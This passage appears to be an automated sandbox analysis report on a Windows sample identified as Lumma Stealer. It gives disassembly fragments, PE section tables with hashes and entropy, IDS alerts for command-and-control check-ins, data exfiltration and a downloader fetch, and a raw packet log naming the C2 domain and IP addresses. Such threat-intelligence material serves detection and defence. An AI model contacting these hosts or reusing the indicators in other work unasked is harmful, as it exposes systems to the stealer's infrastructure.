                                                                                                                                                                                                            movsx ebx, byte ptr [ebx]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add cl, ch
                                                                                                                                                                                                            add byte ptr [eax], ah
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add eax, 0000000Ah
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], dl
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add eax, 0000000Ah
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], dl
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [esi], al
                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add dword ptr [edx], ecx
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            pushad
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], cl
                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            pop es
                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                            add bh, bh
                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                            0x10000x560000x2620086fd8787eabbf93808edccbff1e70277False0.9993148053278689data7.975063363546765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .rsrc0x570000x2b00x20087207cca99727f805df573e4323f07c9False0.80078125data6.091082692530241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            0x590000x29a0000x200fe82b86410d481bfe6c94d162e58309cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            hyifqwux0x2f30000x1940000x194000dbf3d94725ecf0a10c96d7894edaeb8fFalse0.9945358427444307data7.953963317335997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            kzjybfum0x4870000x10000x600772ec3d565de962fc5f281043b231cceFalse0.580078125data5.00379008948569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            .taggant0x4880000x30000x2200e6782c470ada0a3509a4ad87f7d071baFalse0.08857996323529412DOS executable (COM)1.1939021524221078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                            RT_MANIFEST0x486bdc0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-11-22T04:25:57.186382+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.4644951.1.1.153UDP
                                                                                                                                                                                                            2024-11-22T04:25:58.615154+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449730172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:25:58.615154+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:25:59.321357+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:25:59.321357+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:00.643140+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449731172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:00.643140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:01.368243+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:01.368243+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:03.090889+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449732172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:03.090889+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:05.421205+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449733172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:05.421205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:07.756352+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449734172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:07.756352+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:10.828021+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449735172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:10.828021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:11.568197+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:14.194126+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449737172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:14.194126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:14.198969+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449737172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:20.513664+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449742172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:20.513664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:21.234927+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449742172.67.155.248443TCP
                                                                                                                                                                                                            2024-11-22T04:26:22.804895+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449744185.215.113.1680TCP
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.333168983 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.333204985 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.333281040 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.336385965 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:57.336399078 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.614995956 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.615154028 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.617535114 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.617544889 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.618074894 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.664633989 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.681513071 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.681536913 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.681771994 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:58.930277109 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.321363926 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.321491003 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.321563005 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.330488920 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.330513000 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.330532074 CET49730443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.330537081 CET44349730172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.374809980 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.374850988 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.374942064 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.375185013 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:25:59.375200987 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.642944098 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.643140078 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.644829035 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.644838095 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.645442963 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.646940947 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.646992922 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:00.647020102 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368303061 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368424892 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368494034 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368515968 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368592024 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368638039 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368644953 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368786097 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368829012 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.368834972 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.376166105 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.376271009 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.376283884 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.384641886 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.384717941 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.384730101 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.430277109 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.430286884 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.477212906 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569123983 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569380045 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569561958 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569588900 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569621086 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569673061 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569785118 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569798946 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569812059 CET49731443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.569817066 CET44349731172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.829955101 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.830018997 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.830081940 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.830415010 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:01.830429077 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.090811968 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.090888977 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.092567921 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.092576027 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.092901945 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.093976021 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.094254971 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.094279051 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.094331980 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:03.094340086 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.102797031 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.103045940 CET44349732172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.103090048 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.103245974 CET49732443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.197346926 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.197463989 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.197571993 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.197887897 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:04.197926044 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.421097040 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.421205044 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.422590971 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.422605991 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.423504114 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.424573898 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.424679041 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:05.424737930 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.298021078 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.298300028 CET44349733172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.298322916 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.298401117 CET49733443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.491041899 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.491106987 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.491185904 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.491457939 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:06.491470098 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.756257057 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.756351948 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.757476091 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.757484913 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.757808924 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.759135008 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.761487961 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.761518002 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.761723995 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:07.761753082 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:08.678239107 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:08.678334951 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:08.678404093 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:08.678570032 CET49734443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:08.678585052 CET44349734172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:09.556596994 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:09.556679964 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:09.556756020 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:09.557080984 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:09.557101965 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.827938080 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.828021049 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.829371929 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.829405069 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.829740047 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.831031084 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.831136942 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:10.831146955 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:11.568187952 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:11.568286896 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:11.568377018 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:11.568418980 CET49735443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:11.568435907 CET44349735172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.637480021 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.637573957 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.639545918 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.678201914 CET49736443192.168.2.420.109.210.53
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.678245068 CET4434973620.109.210.53192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.931613922 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.931713104 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.931812048 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.932244062 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:12.932279110 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.193950891 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.194125891 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.195705891 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.195723057 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.196070910 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.197463989 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198319912 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198350906 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198487043 CET49737443192.168.2.4172.67.155.248
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198518991 CET44349737172.67.155.248192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:14.198663950 CET49737443192.168.2.4172.67.155.248
